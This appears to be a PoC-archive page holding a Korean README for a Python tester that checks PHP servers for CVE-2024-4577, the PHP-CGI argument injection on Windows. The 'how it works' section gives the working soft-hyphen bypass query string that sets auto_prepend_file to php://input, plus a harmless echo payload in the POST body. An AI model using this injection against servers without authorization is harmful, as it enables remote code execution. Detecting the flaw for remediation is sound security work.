POC详情: 1264a11acfa9efaa2fddeea2a552837b3128df5a

来源
关联漏洞
标题: PHP 操作系统命令注入漏洞 (CVE-2024-4577)
描述:PHP是一种在服务器端执行的脚本语言。 PHP存在操作系统命令注入漏洞,该漏洞源于在特定条件下,Windows系统使用“Best-Fit”行为替换命令行中的字符,这可能导致PHP CGI模块错误地将这些字符解释为PHP选项,从而泄露脚本的源代码,在服务器上运行任意PHP代码等。以下版本受到影响:8.1至8.1.29之前版本,8.3至8.3.8之前版本,8.2至8.2.20之前版本。
介绍

# CVE-2024-4577 취약점 테스트 스크립트

이 Python 스크립트는 PHP의 최신 취약점인 [`CVE-2024-4577`](https://nvd.nist.gov/vuln/detail/CVE-2024-4577)을 진단하기 위한 간단한 PoC(Proof of Concept) 도구입니다.

> ⚠️ 본 도구는 **보안 진단 목적**으로 제공되며, **본인 소유의 시스템** 또는 **사전 허가를 받은 대상에만 사용**해야 합니다.

---

## 📌 개요

이 취약점은 PHP가 Windows 환경에서 CGI 모드로 동작할 때, **멀티바이트 문자 우회를 통해** 임의의 PHP 설정을 주입하고 코드 실행을 유도할 수 있는 문제입니다.

이 스크립트는 대상 URL에 대해 쿼리스트링 기반 우회 페이로드와 PHP 코드를 POST 요청으로 전송하여 취약 여부를 판단합니다.

---

## ✅ 사용 방법

### 1. Python 설치 확인

```bash
python3 --version
```

### 2. 의존 패키지 설치

```bash
pip install requests
```

### 3. 스크립트 실행

```bash
python3 cve_2024_4577_test.py
```

### 4. 대상 URL 입력

예시 입력:

```
http://192.168.0.10/index.php
```

또는 루트 경로만 입력해도 자동 처리됩니다

```
http://192.168.0.10
```

---

## 🔍 결과 설명

- ✅ `[✅] 취약: 서버가 PHP 코드를 실행했습니다.`  
  → 해당 서버는 취약합니다.

- ✔️ `[✔️] 비취약 또는 차단됨`  
  → 응답은 받았지만 취약점은 발생하지 않음.

- ❌ `[❌] 요청 실패: ...`  
  → 연결 오류, 타임아웃 등으로 테스트 실패.

---

## 💡 동작 원리

- 취약점 우회 문자열 삽입:  
  ```
  ?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
  ```

- POST 본문에 PHP 코드 삽입:
  ```php
  <?php echo 'CVE-2024-4577-TEST'; ?>
  ```

- 서버가 이 코드를 실행하면 응답에 해당 문자열이 포함되어 판단 가능.

---

## ⚠️ 면책 조항

이 스크립트는 **교육 및 보안 연구 목적**으로만 제공되며, 허가받지 않은 시스템을 스캔하거나 테스트하는 것은 **불법**입니다. 사용자는 모든 책임을 스스로 부담합니다.

---

## 📂 파일 구성

| 파일명                  | 설명                              |
|-----------------------|-----------------------------------|
| `cve_2024_4577_test.py` | 취약점 테스트용 Python 스크립트     |
| `README.md`           | 사용법 및 설명 문서 (본 파일)         |
| `LICENSE.txt`           |        |
---

## 📫 문의

버그 신고나 제안사항은 email 또는 PR로 남겨주세요.

## 📝 License
This project is licensed under the MIT License - see the [LICENSE](./LICENSE) file for details.
Copyright (c) 2025 KimJuhyeong95
文件快照

[4.0K] /data/pocs/1264a11acfa9efaa2fddeea2a552837b3128df5a ├── [207K] CVE-2024-4577_상세보고서.docx ├── [824K] CVE-2024-4577_상세보고서.pdf ├── [1.7K] cve_2024_4577_tester.py ├── [1.1K] LICENSE.txt └── [2.7K] README.md 0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。